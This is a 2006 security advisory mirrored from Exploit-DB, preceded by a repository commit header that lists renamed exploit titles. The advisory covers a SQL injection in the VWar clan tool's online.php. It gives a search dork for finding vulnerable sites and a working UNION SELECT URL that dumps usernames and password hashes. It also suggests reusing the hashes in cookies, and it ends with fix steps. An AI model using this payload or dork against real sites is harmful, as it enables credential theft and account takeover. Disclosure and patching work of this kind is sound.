exploit-db-mirror/platforms/php/webapps/2170.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

110 lines
2.4 KiB
Text
Executable file

.:[ insecurity research team ]:.
.__..____.:.______.____.:.____ .
.:. | |/ \:/ ___// __ \:/ _\.:.
: | | | \\____\\ ___/\ /__ :. .
..: |__|___| /____ >\___ >\___ >.:
.:.. .. .\/ .:\/:. .\/. .:\/:
. ...:. .advisory. .:...
:..................: 1o.o8.2oo6 ..
Affected Application: VWar <= v1.50 R14
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
Discoverd by: brOmstar
Team: Insecurity Research Team
URL: http://www.insecurityresearch.org
E-Mail: brom0815@gmx.de
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
Typ: Remote [x] Local [ ]
Remote File Inclusion [ ] SQL Injection [x]
Level: Low [ ] Middle [ ] High [x]
Application: VWar
Version: <= v1.50 R14
Vulnerable File: extra/online.php
Vulnerable Variable: n
URL: http://www.vwar.de
Description: Virtual War is a tool for gaming clans.
Dork: intext:"Powered by: Virtual War v1.5.0"
. . :[ code snippet ]: . . . . . . . . . . . . . . . . . . . . . . . . .
line 63: $query = $vwardb->query("
line 64: SELECT memberid, name, lastactivity
line 65: FROM vwar".$n."_member WHERE lastactivity > ".(time() -
$onlinetime * 60)."
line 66: ");
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
example: if you want a list of userid/username/password's try this:
http://www.vwar.de/demo/extra/online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,CONCAT(memberid,0x3A,name,0x3A,password),2%20FROM%20vwar_member%20%20/*
encrypt the md5-password again with md5 and throw it in a cookie... :-)
. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
o1.) open extra/online.php
o2.) take a look at the following lines:
41: if( !defined ("VWAR_COMMON_INCLUDED") )
42: {
43: $vwar_root = $vwar_xroot;
44: require_once ( $vwar_root . "includes/functions_common.php" );
45: }
o3.) add between line 44 and 45 this:
require_once ( $vwar_root . "includes/_config.inc.php" );
o4.) done!
. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
buzzdee, camino and my lovely, sexy girlfriend!
# milw0rm.com [2006-08-10]